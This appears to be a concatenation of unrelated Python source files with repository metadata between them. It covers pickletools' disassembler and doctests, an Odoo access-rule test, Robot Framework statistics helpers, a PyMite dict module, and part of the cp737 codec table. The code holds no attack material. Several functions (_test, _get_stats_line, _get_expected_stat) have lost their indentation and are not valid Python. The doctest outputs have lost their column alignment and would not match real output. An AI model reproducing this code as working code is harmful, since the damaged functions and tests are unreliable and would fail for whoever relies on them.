def dis(pickle, out=None, memo=None, indentlevel=4, annotate=0):
    """Produce a symbolic disassembly of a pickle.

    'pickle' is a file-like object, or string, containing a (at least one)
    pickle.  The pickle is disassembled from the current position, through
    the first STOP opcode encountered.

    Optional arg 'out' is a file-like object to which the disassembly is
    printed.  It defaults to sys.stdout.

    Optional arg 'memo' is a Python dict, used as the pickle's memo.  It
    may be mutated by dis(), if the pickle contains PUT or BINPUT opcodes.
    Passing the same memo object to another dis() call then allows disassembly
    to proceed across multiple pickles that were all created by the same
    pickler with the same memo.  Ordinarily you don't need to worry about this.

    Optional arg 'indentlevel' is the number of blanks by which to indent
    a new MARK level.  It defaults to 4.

    Optional arg 'annotate' if nonzero instructs dis() to add short
    description of the opcode on each line of disassembled output.
    The value given to 'annotate' must be an integer and is used as a
    hint for the column where annotation should start.  The default
    value is 0, meaning no annotations.

    In addition to printing the disassembly, some sanity checks are made:

    + All embedded opcode arguments "make sense".

    + Explicit and implicit pop operations have enough items on the stack.

    + When an opcode implicitly refers to a markobject, a markobject is
      actually on the stack.

    + A memo entry isn't referenced before it's defined.

    + The markobject isn't stored in the memo.

    + A memo entry isn't redefined.
    """

    # Most of the hair here is for sanity checks, but most of it is needed
    # anyway to detect when a protocol 0 POP takes a MARK off the stack
    # (which in turn is needed to indent MARK blocks correctly).

    stack = []          # crude emulation of unpickler stack
    if memo is None:
        memo = {}       # crude emulation of unpickler memo
    maxproto = -1       # max protocol number seen
    markstack = []      # bytecode positions of MARK opcodes
    indentchunk = ' ' * indentlevel
    errormsg = None
    annocol = annotate  # column hint for annotations
    for opcode, arg, pos in genops(pickle):
        if pos is not None:
            print("%5d:" % pos, end=' ', file=out)

        # Opcode character, indentation reflecting MARK depth, opcode name.
        line = "%-4s %s%s" % (repr(opcode.code)[1:-1],
                              indentchunk * len(markstack),
                              opcode.name)

        maxproto = max(maxproto, opcode.proto)
        before = opcode.stack_before    # don't mutate
        after = opcode.stack_after      # don't mutate
        numtopop = len(before)

        # See whether a MARK should be popped.
        markmsg = None
        if markobject in before or (opcode.name == "POP" and
                                    stack and
                                    stack[-1] is markobject):
            assert markobject not in after
            if __debug__:
                if markobject in before:
                    assert before[-1] is stackslice
            if markstack:
                markpos = markstack.pop()
                if markpos is None:
                    markmsg = "(MARK at unknown opcode offset)"
                else:
                    markmsg = "(MARK at %d)" % markpos
                # Pop everything at and after the topmost markobject.
                while stack[-1] is not markobject:
                    stack.pop()
                stack.pop()
                # Stop later code from popping too much.
                try:
                    numtopop = before.index(markobject)
                except ValueError:
                    assert opcode.name == "POP"
                    numtopop = 0
            else:
                errormsg = markmsg = "no MARK exists on stack"

        # Check for correct memo usage.
        if opcode.name in ("PUT", "BINPUT", "LONG_BINPUT", "MEMOIZE"):
            if opcode.name == "MEMOIZE":
                # MEMOIZE has no explicit argument; it implicitly uses the
                # next free memo index.
                memo_idx = len(memo)
            else:
                assert arg is not None
                memo_idx = arg
            if memo_idx in memo:
                errormsg = "memo key %r already defined" % arg
            elif not stack:
                errormsg = "stack is empty -- can't store into memo"
            elif stack[-1] is markobject:
                errormsg = "can't store markobject in the memo"
            else:
                memo[memo_idx] = stack[-1]
        elif opcode.name in ("GET", "BINGET", "LONG_BINGET"):
            if arg in memo:
                assert len(after) == 1
                after = [memo[arg]]     # for better stack emulation
            else:
                errormsg = "memo key %r has never been stored into" % arg

        if arg is not None or markmsg:
            # make a mild effort to align arguments
            line += ' ' * (10 - len(opcode.name))
            if arg is not None:
                line += ' ' + repr(arg)
            if markmsg:
                line += ' ' + markmsg
        if annotate:
            line += ' ' * (annocol - len(line))
            # make a mild effort to align annotations
            annocol = len(line)
            if annocol > 50:
                annocol = annotate
            # First line of the opcode's doc serves as the short description.
            line += ' ' + opcode.doc.split('\n', 1)[0]
        print(line, file=out)

        if errormsg:
            # Note that we delayed complaining until the offending opcode
            # was printed.
            raise ValueError(errormsg)

        # Emulate the stack effects.
        if len(stack) < numtopop:
            raise ValueError("tries to pop %d items from stack with "
                             "only %d items" % (numtopop, len(stack)))
        if numtopop:
            del stack[-numtopop:]
        if markobject in after:
            assert markobject not in before
            markstack.append(pos)

        stack.extend(after)

    print("highest protocol among opcodes =", maxproto, file=out)
    if stack:
        raise ValueError("stack not empty after STOP: %r" % stack)
# For use in the doctest, simply as an example of a class to pickle.
class _Example:
    def __init__(self, value):
        # Single payload attribute; round-tripped by the module doctests.
        self.value = value
_dis_test = r"""
>>> import pickle
>>> x = [1, 2, (3, 4), {b'abc': "def"}]
>>> pkl0 = pickle.dumps(x, 0)
>>> dis(pkl0)
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 1
9: a APPEND
10: L LONG 2
14: a APPEND
15: ( MARK
16: L LONG 3
20: L LONG 4
24: t TUPLE (MARK at 15)
25: p PUT 1
28: a APPEND
29: ( MARK
30: d DICT (MARK at 29)
31: p PUT 2
34: c GLOBAL '_codecs encode'
50: p PUT 3
53: ( MARK
54: V UNICODE 'abc'
59: p PUT 4
62: V UNICODE 'latin1'
70: p PUT 5
73: t TUPLE (MARK at 53)
74: p PUT 6
77: R REDUCE
78: p PUT 7
81: V UNICODE 'def'
86: p PUT 8
89: s SETITEM
90: a APPEND
91: . STOP
highest protocol among opcodes = 0
Try again with a "binary" pickle.
>>> pkl1 = pickle.dumps(x, 1)
>>> dis(pkl1)
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 1
6: K BININT1 2
8: ( MARK
9: K BININT1 3
11: K BININT1 4
13: t TUPLE (MARK at 8)
14: q BINPUT 1
16: } EMPTY_DICT
17: q BINPUT 2
19: c GLOBAL '_codecs encode'
35: q BINPUT 3
37: ( MARK
38: X BINUNICODE 'abc'
46: q BINPUT 4
48: X BINUNICODE 'latin1'
59: q BINPUT 5
61: t TUPLE (MARK at 37)
62: q BINPUT 6
64: R REDUCE
65: q BINPUT 7
67: X BINUNICODE 'def'
75: q BINPUT 8
77: s SETITEM
78: e APPENDS (MARK at 3)
79: . STOP
highest protocol among opcodes = 1
Exercise the INST/OBJ/BUILD family.
>>> import pickletools
>>> dis(pickle.dumps(pickletools.dis, 0))
0: c GLOBAL 'pickletools dis'
17: p PUT 0
20: . STOP
highest protocol among opcodes = 0
>>> from pickletools import _Example
>>> x = [_Example(42)] * 2
>>> dis(pickle.dumps(x, 0))
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: c GLOBAL 'copy_reg _reconstructor'
30: p PUT 1
33: ( MARK
34: c GLOBAL 'pickletools _Example'
56: p PUT 2
59: c GLOBAL '__builtin__ object'
79: p PUT 3
82: N NONE
83: t TUPLE (MARK at 33)
84: p PUT 4
87: R REDUCE
88: p PUT 5
91: ( MARK
92: d DICT (MARK at 91)
93: p PUT 6
96: V UNICODE 'value'
103: p PUT 7
106: L LONG 42
111: s SETITEM
112: b BUILD
113: a APPEND
114: g GET 5
117: a APPEND
118: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(x, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: c GLOBAL 'copy_reg _reconstructor'
29: q BINPUT 1
31: ( MARK
32: c GLOBAL 'pickletools _Example'
54: q BINPUT 2
56: c GLOBAL '__builtin__ object'
76: q BINPUT 3
78: N NONE
79: t TUPLE (MARK at 31)
80: q BINPUT 4
82: R REDUCE
83: q BINPUT 5
85: } EMPTY_DICT
86: q BINPUT 6
88: X BINUNICODE 'value'
98: q BINPUT 7
100: K BININT1 42
102: s SETITEM
103: b BUILD
104: h BINGET 5
106: e APPENDS (MARK at 3)
107: . STOP
highest protocol among opcodes = 1
Try "the canonical" recursive-object test.
>>> L = []
>>> T = L,
>>> L.append(T)
>>> L[0] is T
True
>>> T[0] is L
True
>>> L[0][0] is L
True
>>> T[0][0] is T
True
>>> dis(pickle.dumps(L, 0))
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: ( MARK
6: g GET 0
9: t TUPLE (MARK at 5)
10: p PUT 1
13: a APPEND
14: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(L, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: h BINGET 0
6: t TUPLE (MARK at 3)
7: q BINPUT 1
9: a APPEND
10: . STOP
highest protocol among opcodes = 1
Note that, in the protocol 0 pickle of the recursive tuple, the disassembler
has to emulate the stack in order to realize that the POP opcode at 16 gets
rid of the MARK at 0.
>>> dis(pickle.dumps(T, 0))
0: ( MARK
1: ( MARK
2: l LIST (MARK at 1)
3: p PUT 0
6: ( MARK
7: g GET 0
10: t TUPLE (MARK at 6)
11: p PUT 1
14: a APPEND
15: 0 POP
16: 0 POP (MARK at 0)
17: g GET 1
20: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(T, 1))
0: ( MARK
1: ] EMPTY_LIST
2: q BINPUT 0
4: ( MARK
5: h BINGET 0
7: t TUPLE (MARK at 4)
8: q BINPUT 1
10: a APPEND
11: 1 POP_MARK (MARK at 0)
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 1
Try protocol 2.
>>> dis(pickle.dumps(L, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: . STOP
highest protocol among opcodes = 2
>>> dis(pickle.dumps(T, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: 0 POP
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 2
Try protocol 3 with annotations:
>>> dis(pickle.dumps(T, 3), annotate=1)
0: \x80 PROTO 3 Protocol version indicator.
2: ] EMPTY_LIST Push an empty list.
3: q BINPUT 0 Store the stack top into the memo. The stack is not popped.
5: h BINGET 0 Read an object from the memo and push it on the stack.
7: \x85 TUPLE1 Build a one-tuple out of the topmost item on the stack.
8: q BINPUT 1 Store the stack top into the memo. The stack is not popped.
10: a APPEND Append an object to a list.
11: 0 POP Discard the top stack item, shrinking the stack by one item.
12: h BINGET 1 Read an object from the memo and push it on the stack.
14: . STOP Stop the unpickling machine.
highest protocol among opcodes = 2
"""
_memo_test = r"""
>>> import pickle
>>> import io
>>> f = io.BytesIO()
>>> p = pickle.Pickler(f, 2)
>>> x = [1, 2, 3]
>>> p.dump(x)
>>> p.dump(x)
>>> f.seek(0)
0
>>> memo = {}
>>> dis(f, memo=memo)
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 1
8: K BININT1 2
10: K BININT1 3
12: e APPENDS (MARK at 5)
13: . STOP
highest protocol among opcodes = 2
>>> dis(f, memo=memo)
14: \x80 PROTO 2
16: h BINGET 0
18: . STOP
highest protocol among opcodes = 2
"""
# Register the doctest strings above so doctest.testmod() (via _test) runs them.
__test__ = {'disassembler_test': _dis_test,
            'disassembler_memo_test': _memo_test,
            }
def _test():
import doctest
return doctest.testmod()
if __name__ == "__main__":
    import sys, argparse

    # Command-line front end: disassemble one or more pickle files, or run
    # the doctest-based self-test suite.
    parser = argparse.ArgumentParser(
        description='disassemble one or more pickle files')
    parser.add_argument(
        'pickle_file', type=argparse.FileType('br'),
        nargs='*', help='the pickle file')
    parser.add_argument(
        '-o', '--output', default=sys.stdout, type=argparse.FileType('w'),
        help='the file where the output should be written')
    parser.add_argument(
        '-m', '--memo', action='store_true',
        help='preserve memo between disassemblies')
    parser.add_argument(
        '-l', '--indentlevel', default=4, type=int,
        help='the number of blanks by which to indent a new MARK level')
    parser.add_argument(
        '-a', '--annotate', action='store_true',
        help='annotate each line with a short opcode description')
    parser.add_argument(
        '-p', '--preamble', default="==> {name} <==",
        help='if more than one pickle file is specified, print this before'
        ' each disassembly')
    parser.add_argument(
        '-t', '--test', action='store_true',
        help='run self-test suite')
    parser.add_argument(
        '-v', action='store_true',
        help='run verbosely; only affects self-test run')
    args = parser.parse_args()
    if args.test:
        _test()
    else:
        # -a maps to a fixed annotation column hint of 30.
        annotate = 30 if args.annotate else 0
        if not args.pickle_file:
            parser.print_help()
        elif len(args.pickle_file) == 1:
            dis(args.pickle_file[0], args.output, None,
                args.indentlevel, annotate)
        else:
            # A shared memo (-m) lets disassembly continue across pickles
            # produced by one pickler.
            memo = {} if args.memo else None
            for f in args.pickle_file:
                preamble = args.preamble.format(name=f.name)
                args.output.write(preamble + '\n')
                dis(f, args.output, memo, args.indentlevel, annotate)
| lgpl-3.0 |
patmcb/odoo | openerp/addons/test_access_rights/tests/test_ir_rules.py | 299 | 1220 | import openerp.exceptions
from openerp.tests.common import TransactionCase
class TestRules(TransactionCase):
    """Check that a global ir.rule hides forbidden records even when they
    are already present in the ORM cache."""

    def setUp(self):
        super(TestRules, self).setUp()

        # One record the rule allows (val > 0) and one it forbids.
        self.id1 = self.env['test_access_right.some_obj']\
            .create({'val': 1}).id
        self.id2 = self.env['test_access_right.some_obj']\
            .create({'val': -1}).id
        # create a global rule forbidding access to records with a negative
        # (or zero) val
        self.env['ir.rule'].create({
            'name': 'Forbid negatives',
            'model_id': self.browse_ref('test_access_rights.model_test_access_right_some_obj').id,
            'domain_force': "[('val', '>', 0)]"
        })

    def test_basic_access(self):
        """Reading an allowed record works; reading a forbidden one raises
        AccessError, regardless of cache-population order."""
        env = self.env(user=self.browse_ref('base.public_user'))

        # put forbidden record in cache
        browse2 = env['test_access_right.some_obj'].browse(self.id2)
        # this is the one we want
        browse1 = env['test_access_right.some_obj'].browse(self.id1)

        # this should not blow up
        self.assertEqual(browse1.val, 1)

        # but this should
        with self.assertRaises(openerp.exceptions.AccessError):
            self.assertEqual(browse2.val, -1)
| agpl-3.0 |
kurtdawg24/robotframework | atest/robot/output/html_output_stats.py | 30 | 1180 | from robot.api import logger
class WrongStat(AssertionError):
    """Raised when parsed statistics don't match the expected values."""
    # Robot Framework flag: keep executing the test after this failure.
    ROBOT_CONTINUE_ON_FAILURE = True
def get_total_stats(path):
    """Return only the total statistics parsed from the log/report at *path*."""
    total, _, _ = get_all_stats(path)
    return total
def get_tag_stats(path):
    """Return only the tag statistics parsed from the log/report at *path*."""
    _, tags, _ = get_all_stats(path)
    return tags
def get_suite_stats(path):
    """Return only the suite statistics parsed from the log/report at *path*."""
    _, _, suite = get_all_stats(path)
    return suite
def get_all_stats(path):
    """Return (total, tags, suite) statistics parsed from the file at *path*."""
    logger.info('Getting stats from <a href="file://%s">%s</a>' % (path, path),
                html=True)
    stats_line = _get_stats_line(path)
    logger.debug('Stats line: %s' % stats_line)
    # NOTE(review): eval() of file content -- acceptable only because the
    # input is a Robot Framework output file generated by the test run
    # itself; do not point this at untrusted files.
    total, tags, suite = eval(stats_line)
    return total, tags, suite
def _get_stats_line(path):
prefix = 'window.output["stats"] = '
with open(path) as file:
for line in file:
if line.startswith(prefix):
return line[len(prefix):-2]
def verify_stat(stat, *attrs):
    """Compare *stat* (a dict; its 'elapsed' key is removed in place) against
    the expectations given as 'key:value' strings; raise WrongStat on diff."""
    stat.pop('elapsed')
    wanted = dict(_get_expected_stat(attrs))
    if stat == wanted:
        return
    raise WrongStat('\n%-9s: %s\n%-9s: %s' % ('Got', stat, 'Expected', wanted))
def _get_expected_stat(attrs):
for key, value in (a.split(':', 1) for a in attrs):
value = int(value) if value.isdigit() else str(value)
yield str(key), value
| apache-2.0 |
etaos/etaos | kernel/python/lib/dict.py | 1 | 4692 | #
# ETA/OS - CPU class
# Copyright (C) 2017 Dean Hall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
## @addtogroup python-dict
# @{
## @package dict
# @brief Provides PyMite's dict module.
__name__ = "dict"
class _Autobox:
    # Forwards method-call syntax to the module-level functions, passing the
    # boxed object.  self.obj is assumed to be set by the PyMite VM's
    # autoboxing machinery -- not visible in this file; verify in the VM.
    def clear(self):
        return clear(self.obj)

    def keys(self):
        return keys(self.obj)

    def has_key(self, k):
        return has_key(self.obj, k)

    def values(self):
        return values(self.obj)
## Clear a dictionary.
# @param d Dictionary to clear.
# @return None.
# NOTE(review): the docstring below is not prose -- the PyMite toolchain
# compiles __NATIVE__ docstrings as the C implementation of the function,
# so its text must not be edited.
def clear(d):
    """__NATIVE__
    pPmObj_t pd;
    PmReturn_t retval = PM_RET_OK;

    /* Raise TypeError if it's not a dict or wrong number of args, */
    pd = NATIVE_GET_LOCAL(0);
    if ((OBJ_GET_TYPE(pd) != OBJ_TYPE_DIC) || (NATIVE_GET_NUM_ARGS() != 1))
    {
        PM_RAISE(retval, PM_RET_EX_TYPE);
        return retval;
    }

    /* Clear the contents of the dict */
    retval = dict_clear(pd);
    PM_RETURN_IF_ERROR(retval);

    NATIVE_SET_TOS(PM_NONE);
    return retval;
    """
    pass
## Return a list of keys in \p d.
# @param d Dictionary
# @return Keys of \p d.
# NOTE(review): the docstring below is compiled as C by the PyMite
# toolchain (__NATIVE__); do not edit it as documentation.
def keys(d):
    """__NATIVE__
    pPmObj_t pd;
    pPmObj_t pl;
    pPmObj_t pk;
    pSeglist_t psl;
    uint16_t i;
    PmReturn_t retval = PM_RET_OK;
    uint8_t objid;

    /* Raise TypeError if it's not a dict or wrong number of args, */
    pd = NATIVE_GET_LOCAL(0);
    if ((OBJ_GET_TYPE(pd) != OBJ_TYPE_DIC) || (NATIVE_GET_NUM_ARGS() != 1))
    {
        PM_RAISE(retval, PM_RET_EX_TYPE);
        return retval;
    }

    /* Create empty list */
    retval = list_new(&pl);
    PM_RETURN_IF_ERROR(retval);

    /* Iterate through the keys seglist */
    psl = ((pPmDict_t)pd)->d_keys;
    for (i = 0; i < ((pPmDict_t)pd)->length; i++)
    {
        /* Get the key and append it to the list */
        retval = seglist_getItem(psl, i, &pk);
        PM_RETURN_IF_ERROR(retval);
        heap_gcPushTempRoot(pl, &objid);
        retval = list_append(pl, pk);
        heap_gcPopTempRoot(objid);
        PM_RETURN_IF_ERROR(retval);
    }

    /* Return the list of keys to the caller */
    NATIVE_SET_TOS(pl);
    return retval;
    """
    pass
## Check whether key \p k is present in dictionary \p d.
# @param d Dictionary to check.
# @param k Key to look up.
# @return True when \p k is a key of \p d, False otherwise.
def has_key(d, k):
    present = k in d
    return present
## Return the value list of \p d.
# @param d Dictionary to get the values for.
# @return The values found in \p d.
# NOTE(review): the docstring below is compiled as C by the PyMite
# toolchain (__NATIVE__); do not edit it as documentation.
def values(d):
    """__NATIVE__
    pPmObj_t pd;
    pPmObj_t pl;
    pPmObj_t pv;
    pSeglist_t psl;
    uint16_t i;
    PmReturn_t retval = PM_RET_OK;
    uint8_t objid;

    /* Raise TypeError if it's not a dict or wrong number of args, */
    pd = NATIVE_GET_LOCAL(0);
    if ((OBJ_GET_TYPE(pd) != OBJ_TYPE_DIC) || (NATIVE_GET_NUM_ARGS() != 1))
    {
        PM_RAISE(retval, PM_RET_EX_TYPE);
        return retval;
    }

    /* Create empty list */
    retval = list_new(&pl);
    PM_RETURN_IF_ERROR(retval);

    /* Iterate through the values seglist */
    psl = ((pPmDict_t)pd)->d_vals;
    for (i = 0; i < ((pPmDict_t)pd)->length; i++)
    {
        /* Get the value and append it to the list */
        retval = seglist_getItem(psl, i, &pv);
        PM_RETURN_IF_ERROR(retval);
        heap_gcPushTempRoot(pl, &objid);
        retval = list_append(pl, pv);
        heap_gcPopTempRoot(objid);
        PM_RETURN_IF_ERROR(retval);
    }

    /* Return the list of values to the caller */
    NATIVE_SET_TOS(pl);
    return retval;
    """
    pass
## Update \p d1 with the contents of \p d2.
# @param d1 Dictionary
# @param d2 Dictionary
# @return None
# NOTE(review): the docstring below is compiled as C by the PyMite
# toolchain (__NATIVE__); do not edit it as documentation.
def update(d1, d2):
    """__NATIVE__
    pPmObj_t pd1;
    pPmObj_t pd2;
    PmReturn_t retval;

    /* Raise TypeError if wrong number of args, */
    if (NATIVE_GET_NUM_ARGS() != 2)
    {
        PM_RAISE(retval, PM_RET_EX_TYPE);
        return retval;
    }
    pd1 = NATIVE_GET_LOCAL(0);
    pd2 = NATIVE_GET_LOCAL(1);

    retval = dict_update(pd1, pd2, C_FALSE);
    NATIVE_SET_TOS(PM_NONE);
    return retval;
    """
    pass
## @}
# :mode=c:
| lgpl-3.0 |
171121130/SWI | venv/Lib/encodings/cp737.py | 272 | 34681 | """ Python Character Mapping Codec cp737 generated from 'VENDORS/MICSFT/PC/CP737.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    # Stateless table-driven codec.  encoding_map / decoding_table are
    # module-level constants (encoding_map is presumably generated later in
    # this module -- not visible in this chunk).

    def encode(self,input,errors='strict'):
        return codecs.charmap_encode(input,errors,encoding_map)

    def decode(self,input,errors='strict'):
        return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    def encode(self, input, final=False):
        # Charmap encoding is context-free, so no state is carried between
        # calls; only the encoded bytes (index 0) are returned.
        return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    def decode(self, input, final=False):
        # Single-byte charset: every byte decodes independently, so no
        # state is needed; only the decoded text (index 0) is returned.
        return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream interface comes from codecs.StreamWriter; encoding from Codec.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream interface comes from codecs.StreamReader; decoding from Codec.
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record that registers this codec as 'cp737'."""
    return codecs.CodecInfo(
        name='cp737',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0391, # GREEK CAPITAL LETTER ALPHA
0x0081: 0x0392, # GREEK CAPITAL LETTER BETA
0x0082: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x0083: 0x0394, # GREEK CAPITAL LETTER DELTA
0x0084: 0x0395, # GREEK CAPITAL LETTER EPSILON
0x0085: 0x0396, # GREEK CAPITAL LETTER ZETA
0x0086: 0x0397, # GREEK CAPITAL LETTER ETA
0x0087: 0x0398, # GREEK CAPITAL LETTER THETA
0x0088: 0x0399, # GREEK CAPITAL LETTER IOTA
0x0089: 0x039a, # GREEK CAPITAL LETTER KAPPA
0x008a: 0x039b, # GREEK CAPITAL LETTER LAMDA
0x008b: 0x039c, # GREEK CAPITAL LETTER MU
0x008c: 0x039d, # GREEK CAPITAL LETTER NU
0x008d: 0x039e, # GREEK CAPITAL LETTER XI
0x008e: 0x039f, # GREEK CAPITAL LETTER OMICRON
0x008f: 0x03a0, # GREEK CAPITAL LETTER PI
0x0090: 0x03a1, # GREEK CAPITAL LETTER RHO
0x0091: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x0092: 0x03a4, # GREEK CAPITAL LETTER TAU
0x0093: 0x03a5, # GREEK CAPITAL LETTER UPSILON
0x0094: 0x03a6, # GREEK CAPITAL LETTER PHI
0x0095: 0x03a7, # GREEK CAPITAL LETTER CHI
0x0096: 0x03a8, # GREEK CAPITAL LETTER PSI
0x0097: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x0098: 0x03b1, # GREEK SMALL LETTER ALPHA
0x0099: 0x03b2, # GREEK SMALL LETTER BETA
0x009a: 0x03b3, # GREEK SMALL LETTER GAMMA
0x009b: 0x03b4, # GREEK SMALL LETTER DELTA
0x009c: 0x03b5, # GREEK SMALL LETTER EPSILON
0x009d: 0x03b6, # GREEK SMALL LETTER ZETA
0x009e: 0x03b7, # GREEK SMALL LETTER ETA
0x009f: 0x03b8, # GREEK SMALL LETTER THETA
0x00a0: 0x03b9, # GREEK SMALL LETTER IOTA
0x00a1: 0x03ba, # GREEK SMALL LETTER KAPPA
0x00a2: 0x03bb, # GREEK SMALL LETTER LAMDA
0x00a3: 0x03bc, # GREEK SMALL LETTER MU
0x00a4: 0x03bd, # GREEK SMALL LETTER NU
0x00a5: 0x03be, # GREEK SMALL LETTER XI
0x00a6: 0x03bf, # GREEK SMALL LETTER OMICRON
0x00a7: 0x03c0, # GREEK SMALL LETTER PI
0x00a8: 0x03c1, # GREEK SMALL LETTER RHO
0x00a9: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00aa: 0x03c2, # GREEK SMALL LETTER FINAL SIGMA
0x00ab: 0x03c4, # GREEK SMALL LETTER TAU
0x00ac: 0x03c5, # GREEK SMALL LETTER UPSILON
0x00ad: 0x03c6, # GREEK SMALL LETTER PHI
0x00ae: 0x03c7, # GREEK SMALL LETTER CHI
0x00af: 0x03c8, # GREEK SMALL LETTER PSI
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03c9, # GREEK SMALL LETTER OMEGA
0x00e1: 0x03ac, # GREEK SMALL LETTER ALPHA WITH TONOS
0x00e2: 0x03ad, # GREEK SMALL LETTER EPSILON WITH TONOS
0x00e3: 0x03ae, # GREEK SMALL LETTER ETA WITH TONOS
0x00e4: 0x03ca, # GREEK SMALL LETTER IOTA WITH DIALYTIKA
0x00e5: 0x03af, # GREEK SMALL LETTER IOTA WITH TONOS
0x00e6: 0x03cc, # GREEK SMALL LETTER OMICRON WITH TONOS
0x00e7: 0x03cd, # GREEK SMALL LETTER UPSILON WITH TONOS
0x00e8: 0x03cb, # GREEK SMALL LETTER UPSILON WITH DIALYTIKA
0x00e9: 0x03ce, # GREEK SMALL LETTER OMEGA WITH TONOS
